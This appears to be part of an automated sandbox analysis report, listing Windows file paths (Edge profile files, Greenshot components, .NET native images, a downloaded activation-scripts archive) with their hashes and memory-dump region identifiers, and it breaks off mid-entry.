SHA512 84db15565dcf1d9b1fc992b5a0843edb5c4e15e5ed9fae1d37bf2fd7b7111c4349511057ef559f863535379c9fee3107efaf525ec7273437894f97d02a492e63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ba69fb095f810909f5d25f92a18c1208
SHA1 e65ca6628cecf9a04ef733d42058c576e41b1e5e
SHA256 814f39cfd9a57387a3bad316bf8269c76e9f82d2f3b95cbf59ab8bbf4f80bd43
SHA512 58016765750783ef3d3bbad989b17ab927519f8724299532c349286fae4e2dfe22c3af6d45a56094723d09999ff01a59b7547e104c940bd3c61c22f11614001d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 674b847b91b54605881f679e4a57384d
SHA1 49279a9b38b0629e6f9ddc745bb0821a5e462d99
SHA256 1b2d044f43fa14d46d571f956231797dda83bc4dcc8b6e5e5e202738307aea68
SHA512 fd33d41983406aa7190b896b52981caf1d55de47b6c60d8174cbf6c729c773f66ccd9ac29db5e5415df9dfdb30abb884e512b32767d61ef912a48791a0a7785a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 68ae27277292cae62c51b7b6406d1817
SHA1 7b7ad6bf095ceb959c2b37645976df92aa5b8c51
SHA256 1c06edee2f170fcc229b9305c947de45cbe23f2b9dfec31adcf2d4f0c958058b
SHA512 a51562266c7d94b8f6b87407c7dc590a157182129bf55178518ead38f6632724cac6156a9da53029fe418e9efa28b66dfdc2b79dc172fd2ac1da32dd1b193985

C:\Users\Admin\Downloads\Unconfirmed 506997.crdownload

MD5 c16f86882d5a102ed7a0fbbc0874d102
SHA1 4e3ac7a53f0f368b9218bf717162d5e073a0f7df
SHA256 1687311b4e7a3720be20490e8ed6cc772a32336a7bed8896e475b8ec616c6b81
SHA512 90b7aac54467b266a9dd9ce7c83a156d3d99f7aeb1ad0e3e2ef5516b38270112dae07892e3e80765c3508484e3ee66e7439db0512a63b48f64e6b15e83285f67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ed5476de2d270693c21f0f331d786f24
SHA1 e3bde4ab36fb07dddac8b862cfc484d8a7cc56a5
SHA256 eddbd43c8634a6aa13bd1e89479f34a0bae0e84bce1cbc4fdea613e931952087
SHA512 432e6f56e275cf6bd45013229c3e8deebc99dc605f2799766fd876672a94df7ae143e3e5bab9079b72f1b765b93d8938fa3b81aa984aabf4612cce1f851c34f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6f059000b406117eb89ea68370d4c555
SHA1 111c4ad71d010ac43a0c760bb8edc943843187f4
SHA256 66afb3f90047ef59f2dc67563d54c5665f43fa61c501a8f8fe6df970c1188d6c
SHA512 51dac35e7c3be8402bcc950626d4616cec356958d38956259f50124e5b2fd987c6a918fab066e56ae51c98a52930e8afb35fe04f17f1346d416e5193b5c73aa2

memory/5876-992-0x0000000000400000-0x000000000042A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1f3ed0d4cf310f7f7db58cf8a7161856
SHA1 9074111554d27b4f2b270f53d46410381138b793
SHA256 628f2684c0cc2eed4c3c4318fd7c00b59c1e5ff973d0a6843ca65c8f43b4985f
SHA512 5f6993e45dc8dad8ef95c6dd4642baee7fdc669282c2c745c5469aedb94fa3b307511f92a325cdb07597099f4e576ceed9de8cffd82c57c4cf43d3f102459dcd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b68413cd4fc26805833328ec6dcd1f07
SHA1 eebdfa0cd9e9cb32b1d1aaba71e14c6b483eb93c
SHA256 6c92ae8f747d245926dac90654fb1d03734d61d3ef4b08481689e3bf47a7727f
SHA512 c0ed451e65d886968ddf5a25452696a993612988bc3b78083bbab58efc7ca33cab4b89fb0f642858a7fce5979125960f02788feedb5489211d04f007a1574936

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 32c84dbeab5ef3e53ed54c5d0eeddc3e
SHA1 b15f4501d0b19e255d8bf8406db59885a23b76ee
SHA256 86249c5a8107333cee3ac11affd6ccfedd6c2da6479b7abd84ea3309ed6a712a
SHA512 9b78fa6dce6bbc98398c23b408ffd6e870c4015844e874aff199634cb573aff1d43397ebb3ae82b86c1b4b9960302cf17c84481eff2c2d10748e3c2fab379d67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1c98b837bbca3ebdd0fa7c3efa18782c
SHA1 97523910f64cbfb45e5b5461bab607ba0d1e6622
SHA256 8a7aaa44ee37a9b03d9f8670ef14570addc76e3ca7480730917030980521ca66
SHA512 b2b33b4446fb7b7d39b0291da626e63720d71c68c2b9310bb760932837a49c9435d9dd28e75c566e1227220b51a1b2fd539ee230195945051f985fe1a9332d5d

C:\Program Files\Greenshot\unins000.exe

MD5 d1a078992e232919ea834226aea627a8
SHA1 53f5af8c06721ef5b62f56037e3b57dc4b517eaf
SHA256 655da9c7f64ef8f0f48160c76b8dc5443aaba63e8c6b3534a266e9cd5a18489f
SHA512 e056370322e58725961c024d1f322d31066bffd8b8d77f80fc14d2b5861788ef00e5ebc3fa6f51a6b0a94bdb02e8fffea48926716275754dd77bbe0fb8e221f8

memory/6080-1299-0x000001C6B2700000-0x000001C6B2782000-memory.dmp

memory/6080-1300-0x000001C6B2670000-0x000001C6B26AA000-memory.dmp

memory/6080-1302-0x000001C698890000-0x000001C6988A6000-memory.dmp

memory/6080-1301-0x000001C6B2900000-0x000001C6B2970000-memory.dmp

memory/6080-1303-0x000001C6B2890000-0x000001C6B28E0000-memory.dmp

memory/6080-1304-0x000001C6B2B00000-0x000001C6B2C88000-memory.dmp

memory/6080-1305-0x000001C6B26B0000-0x000001C6B26D2000-memory.dmp

memory/6080-1306-0x000001C6B2A30000-0x000001C6B2AE2000-memory.dmp

memory/6080-1307-0x000001C6B2970000-0x000001C6B2992000-memory.dmp

memory/5912-1309-0x0000000000400000-0x000000000052F000-memory.dmp

memory/5876-1308-0x0000000000400000-0x000000000042A000-memory.dmp

memory/2968-1311-0x0000064488000000-0x00000644881DA000-memory.dmp

memory/4508-1325-0x0000064449A20000-0x0000064449B18000-memory.dmp

memory/4184-1339-0x0000064443EC0000-0x0000064443F11000-memory.dmp

memory/4192-1353-0x00000644451A0000-0x00000644454A4000-memory.dmp

memory/2768-1367-0x0000064445320000-0x000006444561E000-memory.dmp

memory/4556-1380-0x0000064449980000-0x00000644499D8000-memory.dmp

memory/2252-1440-0x000001CABF540000-0x000001CABF5B0000-memory.dmp

memory/2252-1441-0x000001CABF8C0000-0x000001CABF8FA000-memory.dmp

memory/2252-1442-0x000001CABFE70000-0x000001CABFF0C000-memory.dmp

memory/2252-1445-0x000001CAC08B0000-0x000001CAC08C6000-memory.dmp

memory/2252-1444-0x000001CABF900000-0x000001CABF908000-memory.dmp

memory/2252-1443-0x000001CAC03E0000-0x000001CAC08AE000-memory.dmp

memory/2252-1449-0x000001CAC1450000-0x000001CAC1522000-memory.dmp

memory/2252-1448-0x000001CAC1340000-0x000001CAC1364000-memory.dmp

memory/2252-1447-0x000001CAC1250000-0x000001CAC1308000-memory.dmp

memory/2252-1446-0x000001CAC1140000-0x000001CAC1186000-memory.dmp

C:\Windows\assembly\NativeImages_v2.0.50727_64\GreenshotPlugin\d1de0df1f6fd715112604acd213f2d7a\GreenshotPlugin.ni.dll

MD5 0afb09c97777a329dd05cad51a7e2a96
SHA1 9c97a59a8154d0cc5c767402aa11141afab3c5a1
SHA256 1225dd4003d33d6591a22b96ad246918bb54c65b3c78effa14794a0203ba68e9
SHA512 e73cc2e2bd845b1b42cc0bcceffb09f107f4254cc95f99d9ae5551a59b5576597d45d6457678b9fb3d897a9e1a594199838d27b7ecec4253c5b1eaab51253d23

C:\Windows\assembly\NativeImages_v2.0.50727_64\log4net\c5e4b5ba6d1ce9dab03aeb81a00b45b4\log4net.ni.dll

MD5 068792db61bbdecd04d80b3cd3594c32
SHA1 a7ffb330596ee0113d5f79fac742463fa30d2154
SHA256 82dbc6080e73ee4da40836a2118d825db3aa42ba3e2fb66678f0fd12d8352beb
SHA512 3b2e7065c06deff70e1a4367e6dffb37a68b4c5165a15660d3e45bdc368074f4ae3e0614bd2ebaf456df69e36f2138c81a78f8a90adf91ac595d57796ae1d813

memory/412-1462-0x0000022E12720000-0x0000022E1278C000-memory.dmp

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\e4db39da8a3b5543110df6ddd38ffeeb\System.Configuration.ni.dll

MD5 060d36538a1c937e32943af480971b3c
SHA1 657c94ac480653524461015bdfe761dd212c31d8
SHA256 6fbd851b513860f8354ed70c447ebb5f16754be86057c87dd6d46988f9507c08
SHA512 4b8ff37bb1a9a43d672782f3fa3e9ace68a444bb71d8088842090e8c82fa5f2cbbfc2bdd12192af7949e269d8b957cc0bdc283469c15624efa47e4e1197c03ac

memory/5640-1469-0x00000200ED100000-0x00000200ED2FA000-memory.dmp

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\c14588e2f9efa4d594f46143f50e7bcf\System.Xml.ni.dll

MD5 b8b08ddba209e4919d9d3a08f565c29d
SHA1 071f0742629bdc4218416180a2a73b5fcf8b54f5
SHA256 536e053fa013c1999114139ea175c5622ac9ba98c39e76cb94537a7eb82087f3
SHA512 9cf3e5cab9f994b4ae866cb3ea3cd7bb54a4dce3c033355355951a7722e28d94a1d05e3f55ed0e35d10edcf3680a57afc0ac8db37eba4e9e0f7b4c66486e7724

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data.SqlXml\466db48c0235f1d6a651e870b94d9391\System.Data.SqlXml.ni.dll

MD5 7863dad6521ae06d91567a415e4476d2
SHA1 54325d3e8fc1e2b698c12f70fa3ab85ef4b5c523
SHA256 0b038ffd06d568adc200d6a8909d3a05c3f66580ff13db3590797fe674825101
SHA512 9d4ebb8490ba920d833947dbda98a830c82e1a94b98091f9fe8768de037e33334e1e27b3b31e88470a87a5c8357b808e1a6c7a77a5e1fe58b11990e00ae473c9

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Security\170c3a6a84f7509ab63e98937e4652cb\System.Security.ni.dll

MD5 6f61c6adae2b50681325a6dfddb29d62
SHA1 c406bb31cdb08d38694efaf93b04cbb4f081d001
SHA256 2b51e20e4debe5c2e697e032617b7d7d6d4251508e1423019e24bb851efe6faf
SHA512 ed49b6cf1417d1bc9508ab586829c8437bda7f1bb572bfd06b7ebab894cafccadd653ec86b13052dff4fb19436c3e0e498f5541213c16fb653d2574ed13723d6

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\c7e28b9bc4375c076434dce6fd7bf657\System.Drawing.ni.dll

MD5 d9c40ec0dadd4e902bf4e862c42a8411
SHA1 2527b3e1f404ec3030f6553cf54f466830c4b95d
SHA256 4ce12ed8daef863e9aa208a1e66d8df449306bfa417f0beec43da0b545cbb23d
SHA512 9b54ae2242080ab5b15a9c56e4c1991a9fa99b9df184835a5d7a0c166d68cc6af7316473bef186369d1d411c55d4b5631b848647327357bea181d3000708d918

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\8207c013c0f0da13624762755d9e7c4e\System.Windows.Forms.ni.dll

MD5 796a9ddd51615383d3fff96b38c6ddb9
SHA1 52bbe495b840a58bf0ea333ad2f685da8803ae5a
SHA256 ba71dd4860e1fe1fbd91774f03cc637d7b890c610627280b41d4e29f15070457
SHA512 aeff4108a6727093a59b12bace8893a6a332a950199537a251aac60a2e232fa0ca12bf51fc8223474b06f9a9fdcd5fa5b4fc678fe1890b15777f472bd20975be

C:\Windows\assembly\NativeImages_v2.0.50727_64\Accessibility\e176a6d5cd5cdfd653e8096aa31617f8\Accessibility.ni.dll

MD5 a2e50fcb10e8525c93dce6c99fbe43ac
SHA1 09a2d26a808f1c89b3673ca18c039dc59d26532e
SHA256 70f98e52fc8bf0321b9562cccd5ab2f3b5062e9820909a3a9ad2c424c7b36bc3
SHA512 92201aa57506ee3bae3c8e590806c6f01e79166df86c956d656b9b829cd17a7c550bbc2ab7659bd380a6f275324845586352078b480ab5c4212b72819e096071

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Seri#\73d2d7d094c2c3328313c73b10aedb97\System.Runtime.Serialization.Formatters.Soap.ni.dll

MD5 4ae40df8d34370140a381717ab50ee43
SHA1 77e48136dade400051a769dbcfc00df53c418a26
SHA256 229f36348993d723444e3efd8f7271a4faa5e1076e6d22ec74f0e81e0a988c44
SHA512 b9f1debd3eb7ced28f864e5adf271b4f3a999f975b267112dbc4e58a7ecec8e4246f6a9093f576844f2365ce41de380e0a24838b999db345c7a6b236de647133

C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Deployment\e440b98295230d470860686828cad356\System.Deployment.ni.dll

MD5 056f22728c8c630c4034d8b07936ba1e
SHA1 0a9ed151742ac74d745f4a2a9f8891a191f29065
SHA256 ab1f07fa49a944c47b29d52ccaf1b926985ed230c2ba78cbbbcd578231a5f9e8
SHA512 4bab3240e6e6fb2ddcf5fde7be516cf64c0c1882ba5c9da7163b8174d3883d4985c52c25a00f0b4e0dfd717980713775a614024afbeebeb6c5ec8fdeba22619f

C:\Windows\assembly\NativeImages_v2.0.50727_64\LinqBridge\f1ac6cfcd7f7945010f005a8862c17c2\LinqBridge.ni.dll

MD5 832c5a96e82427912ad90c7c6ef8f022
SHA1 1be966903e09c9097dbe7f872c0463fafeb90444
SHA256 2c8fc5ac5f91265987f473b071e8313ee2f707963e8ac128c54bc746ad1ee3be
SHA512 c2130f5947d3200384e1af3b338b52535ffa5bbb9041662497ee25b08084f2ee084313f7c8ffb78de093a229f76e51157e3681da0b6cf2ad0875e6caf61262b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\37a9d4cc-e80a-4a63-a9fc-cbcaca632c65.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 69fa7f6ffa2848ade334002f28f6adbd
SHA1 79ee34eb864ee1c9a47e9bb3de0c4801460e1a73
SHA256 2e479f746996ec09310fa5887aed2f26956e548fe34ea684da029f82ef44d94c
SHA512 0c03a1fdd39f75eb42a4d8c6b8b9d42b1bb9eeb4bea5fa6b2ec1d9def30509db483ba6ad5b7bcb374c4c35ef82120a878cec56fe15679a157166eaeb23e9995d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c5fa189180a4b32f88ffb066925097f1
SHA1 5721143d57e6a3da34bec6f8dd4fc2100fd176b0
SHA256 29c50b0dc78a7f30788cf85372def5836c50428c5a166ad787503020717366c4
SHA512 2f4f263d2c43a103b8ff4a9c60c26e71808ba33eccad26a6cd2903cd1dea28bd62a3aa273989f27449d4348bb8c335d9f6b4ada902e9b7a6bf59c62676979073

memory/5532-1567-0x00000000007A0000-0x0000000000822000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/5532-1578-0x000000001B4E0000-0x000000001B4EE000-memory.dmp

memory/5532-1580-0x000000001DBB0000-0x000000001DBBA000-memory.dmp

memory/5532-1579-0x000000001B7C0000-0x000000001B7D0000-memory.dmp

memory/5532-1581-0x000000001DBE0000-0x000000001DBFA000-memory.dmp

memory/3064-1582-0x0000000000F10000-0x0000000000F1A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\7ef1abac-aefa-41fe-b2fe-fb9edaf64b55.tmp

MD5 226feb9cc2ea5ee22e535720ac0d3055
SHA1 4c72ea13025783f339cbf176e37467b78fde2db2
SHA256 cafeb0e21dd6dd160153b082785a6d7bdd4ad0e3e07ef4f0a2ea352bedfa3e30
SHA512 ce356e1cc381f22362aa9737939c35b7470ed278cd1916e29a199b36d1f6d60d495561f921fd9c278edf2a5504bb8d2021f82a5753b1a8105de36ae5f32553bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 828c52729e614cbbdd8435429eeef979
SHA1 25ba6e4d82072335fd2be3094ba6a472bc8a9b96
SHA256 d74df6a3f1d61effd8c47ad42ae67f7ca4678af13dc31f6df47ca04a09a72834
SHA512 0645ec876f94ec3137eadd19185251cb7d025209af5c6e4c937bf7f28b5dc950fef07dd346e611ca03750e3fafa34de04a40e0d0870f925b6288919d024057af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c90bc55a73329d6546df66fcb040dbb6
SHA1 f3911c16cf6d4c1780ea2b33e7ae99ab31a6e032
SHA256 59981fccdda4f5e9a41650df8e9fed528c0f36da1bde5988188b407ec904e142
SHA512 1301cb7dde3852fc7fe7f31d8c1cabab65d3be52aba33f5181167e965b338a7128be663b646e8283935eda90af47971b6f093c0bb263e470148e5f8b349938e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ddaafff0605b874d17a1dc4321e07426
SHA1 b4552b0dbdbda4d8a11be0cbdc2105aadaadcc90
SHA256 8418958edf58f3e5a7fa6a7da90b9bbc45b53001a24591ee1722d12bb1ab9fa6
SHA512 b642ea2e3220c1a26cf5129be628fee2ca27543cd3d4a89196db6d0888a65a6a4da0cd7945f723859bdc5afb8391bbd7606d69c5a49da04aa8cfd413feb3d644

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5b9654655a99901b81081e02487f2335
SHA1 8547d92e99a4975a26e710778a3d69b32e745ad4
SHA256 316a4593ad95051e89625a5048b1ce14747bdf095b63b3389376830e1505220c
SHA512 13361da36d8094f6da35071f7780ff80615e1e04b08849790941c3781ea7519422727068127393c8a27262a6bf8b02368db042eb79e69519ec894667164e2212

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5127e46a9873c403f2610fdb3a476488
SHA1 29b414aed39ee47379a8f8c5b7cfa09e52b52a4f
SHA256 69053bb0a53aecee87b225e5371969f53d701a1ea7f4f2b11764758a91209a5e
SHA512 1d10b60affe2a355a191e88ce46e538e61b136b3a3a55adeb35650cc7c063aaf1ad712a10135b6d52cf490337b646f4347a2170d0150b581526e4c4aba83cc57

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 17f53dba7d9cb4da99891e48e9ed5934
SHA1 1cb47228cd48ee02d36e0239f302697506484167
SHA256 42462c3b6e3fa4816d47e3c7cafc05d73850db5641319048b7801fc40b888074
SHA512 f23d36e2e625a56f4b3b37b82ff287c42eeb99d0f441c559d3a823bdaa817cf21789fcea195e1053443fd4fee7281f8cb7b4f51f1d3b54fc458616eba37a6b91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b9f9bc535233d1152df79ac96bb76663
SHA1 7deb3049550508cf20774f7756d8910966e9b886
SHA256 a36579e57038aef8bb810ea3d0731bd86db046b1b1ea245ccc440b68ebe6ed83
SHA512 8d729b1d783bb2f77dbd87e37a4c40cb44b372b2434cc08ea519602141757fc86b1c3b3a8bcec825ad0ad9ad92fb378f50bec7cdd923e60cce7f2bd20d04bb39

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b160a94b902968b62233b0749ffc6c97
SHA1 2925c4a47b71ca9bf8380d07a689421c6ade1f43
SHA256 a1ce364c22aa526334abf0fb5c4533296ae6297745ba23522d5baadf0bddcb1d
SHA512 c235eb5b19d7b1009eb0caf3b9f7cf5c45b98559c82d2b29e9f5bc97435a24ba281d58ebe4ad60fde41d760fcda0f69d1855b9faa49d195c0d2df1f7aed1aa16

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8c93ca6ab441d54c5f6916850284226d
SHA1 b3f14fa160333619abd549fd5ee3de58483baf19
SHA256 329c6a070acd43e6addfcfcb92e2f87bc2302c64492056bbba6f0d1e19499cf6
SHA512 68e1f1572047d807f0502175b4f0570e10ebcd43a7d69810d224de1f63a6bcc388e419260f838325e4f74a74342b77424001f2d474d9a10b3ef5ded82bc2edd3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0f86c6dfeb521dd28271136329fd0d66
SHA1 5d398508565c345222115325a0eed079ab4911be
SHA256 f5e3efb8b47ecea2a4bd10322a2cee3b8405297b00805e735370fc62c6233ac0
SHA512 10e82018227460bf3081c383314f9b9b7f6a1340f4c66097998b04dff9410bec5aa30bc8cb11e9f12cc65da18419aded7c1eb572297517ab465965cd1228f906

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 22b16d5173981a536e8e2260b8e9b88d
SHA1 7d0f4943e593ca9bb328c118b0e25ca3129a0471
SHA256 d5bd527cc69127ac338c5bb9d71d2dba06ca81985d42d6698b7e0c0f7cbffa5b
SHA512 f91a8fb90d58a89c9d04681d9841c380b4ab181d63bb8813a59b038a8d65b9d217b29b0ed419479b860016d8f54363a0e39d99a5771fad942f31d9d2f9ac9a1b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RXDPSXA6XH2DN30U8PY3.temp

MD5 4fcb2a3ee025e4a10d21e1b154873fe2
SHA1 57658e2fa594b7d0b99d02e041d0f3418e58856b
SHA256 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA512 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 589c49f8a8e18ec6998a7a30b4958ebc
SHA1 cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e
SHA256 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8
SHA512 e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c371d2c48bdd45a780ae3f814ecb34f9
SHA1 62606b6dd0a80a42d5ca4b50d32878965c27bccb
SHA256 f6ce3bd88228081e78c8d91039addc8823fc1100b294cef4d3c333ef37ae85bf
SHA512 2520e2cda97738d05b629c1722520c4e5b63e4a8c80367d2e641bf71a85a2236640ea871e7150fa780b7864d4f141852eb381903d3fd48873df40316084ab412

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 52ff5a5c29bba21c47ad07dd82f9959d
SHA1 e2c85d4db199c19006bdd8f9f153ab6987d81264
SHA256 263b6cf2ace4310f46b69aa178396938651bcc8400849789b69e8d91863fb387
SHA512 8aec1b9197a3ded28e5d18b339f070cf929960747ade16776418bc41fde14ce6b7c122d25abf249cc15142782f8b9ccb1dd7efc75baebd0b91d18ab9e998554c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1fe320a53f9ebf969e2ca97c84aea322
SHA1 e6546ae31197f47752f625989246b89500ab0fa6
SHA256 afd21b89e07d88c4fdbe89eae2cd73e61c534e77209979da2e9de917b41ac990
SHA512 78fd98cf908da84ce2514395e6894211618273ccb3de2e38d1fffbe7cd9794f0cf2bf89b32eff569331cc58a77b5c126315c2a6fa659b3a163e0555b257701cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 343d0fe18f61d1c19e564ef1811c349b
SHA1 f95fbc2393b322e0852232d5509c93ccc7eec297
SHA256 94195f35a3d76c37a6db44fdda2ad2e2b417bda52905d6f712f4e2c98a4ced52
SHA512 042238ea89ede8834524c16fc96bc0a055542d76e12733eefd7defe93b7869fa59e8a6aec1af2a4f526c4fdae15d06da513dbf68caabe4553114cb1b922fa9e1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 da557336712c00c8ebd5bba26289af89
SHA1 7eaf0db47039f7abb9f8fd135a116c30241ddb43
SHA256 fc7eb83d942a887c13aeeb0d799d4b915b7a305bf7b86cbde62a174839185fda
SHA512 9882f9eed9d3e82963c0a2dc4a66e183d41dd146a38519a284fc2b86de8e9d01fa1856783c774bb35b064dc4edde473557488c71d8e0e7db9ff486e206bc9441

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5410366d71e705ea9bde0128a306ccfa
SHA1 3f9166c1d4ca37c3cc5e1d8bb42a7c686bbf1224
SHA256 38ca6b9f0318aded4d23ba7ed097dc253ff7ad1b312701921a2684794dc068bc
SHA512 4410ea631b63238fd85cd8583f371e11027de453f4ba7ec412f30f9eb4bb3fdc364f9f4de26073fa8be8aa9c260df83305e6e4705974167b069e7eeb0e0b29a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe61f368.TMP

MD5 a21188ad9f40ee41f2a5c64dbec3698a
SHA1 0688131e72eda47dce3173e0f52e188f023bfed9
SHA256 9a2741098678a553ecb7239a0dbb5c23083f7a7b6eaf47b3ec276567c759ca58
SHA512 e104a899253b37618168a47e5b65111cf68fe217ad19e1573e7eeb2f90f5800834436a546f946eab3e129b58cbcd6d708b2282d76fdb28d278561120600b3877

C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master.zip

MD5 bf0f1add95ef479d38db30554a4aede0
SHA1 e05b44aee0a9df0edaa7de4ad24fa18ad407075f
SHA256 f798b0790fd6e62fb0ff0195c06f7c655ae0a55e1b3c9d6b4c28b7d5483ce6f6
SHA512 2f4b4d50844db1064de7ac918738ab21621f7245434aeb74de2fd2baf0c4367ad4057e5c9ef810f09e5c374ac4e3ea8ab85d960d3549f72b763dccb2d37e8925

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 54a9c896232e4bdcdf46b0e453de1701
SHA1 3564af531107d29de9eb9a815881d93ec8c21313
SHA256 f7be41f180ff23b35bc337a71ab1b1efae7ebaf89728496e4b1933481cabe749
SHA512 b8b663eb81614fd738e8af005b6ddeddcdee9087b33f05f6628e0a3079b414bf80a41d1016259dce06f427b71c8b696d12746cbe1c4dd088159fef999ebb6d9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 44a10d47ce93c393fbca89128cbe1423
SHA1 bea24b64d3a8167ebd4334e815d7d8ceb97d9708
SHA256 2dc91bd7c36f01a2c9bb04b01c33f24ab98b6fe65c83b5cac6368763b68e08ae
SHA512 e63dfc397a009cc36dbb895ebcb93f075e24a465c75f57fe949b2182ee0b8ee6690f5910d49d7f78d5239df5c9853f8406f0a64bf315b34ac9e82f3186176bc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 46992062da814e698de5813c518bf0f5
SHA1 58119e38ab2032dd9f0dc17501f2e09896e8dda6
SHA256 56de75a94dda498d65ce90881afb1cdfd6b5ffb878fec9b47d930159333d804f
SHA512 4b16ecb871113f546bb650f871bdd55b2cc397b646d7aeb674359c53120ea02580f25b4460d47993de3718eaec9267654fd6bc6f59ce77589f99881543d401cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a7dc262c080fc8f9866c372520c6d571
SHA1 0a2a2cad59fe32142062821abd919968851f6074
SHA256 4bbfc2dbf72731c4545734c5bccad0c4d76f589adf1244eac3a5d7a655736ba7
SHA512 301edaae94e22905f5ad7a9a435fd617a6030e0a84696e035051ec41b9c2379ab4aa15e0b3056ec08ac4b9a3a945f974254bef63d84150d72675b7f22988105f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7d7f490ab1a5145cfa3256f530412c89
SHA1 990fc8bdcc590d51585c2dc529ba95f0776a731d
SHA256 fc9358528734ffc7ef02d0ef667b06a181b7b1dc28baa557b201371035b262ca
SHA512 a5d146059e166785e74f721b32f2d4a16778ff76f52d57eec4db91c9685311c4d68cce1043e18f36bac1f22e88ae45c808dc26c351f631110b41cb197394a949

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 17da28cb77e424ac192ff9447cb2c4c8
SHA1 7f36ac1179871a6b618862f7267083479201c3c9
SHA256 cf606aec00453d80b82320ac2e0e8deb38a6e57ca58739cde71673f563399d80
SHA512 2c59ac5cbe9a38b7010d37b939feb5ff3f0f6210defdc88bbdf27d81b5b2a66083809f2cf973f63aa84b1d9ad7eb2444ed7c2b78f47cc803548200a21d091e3b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_flgb5wjn.mlg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
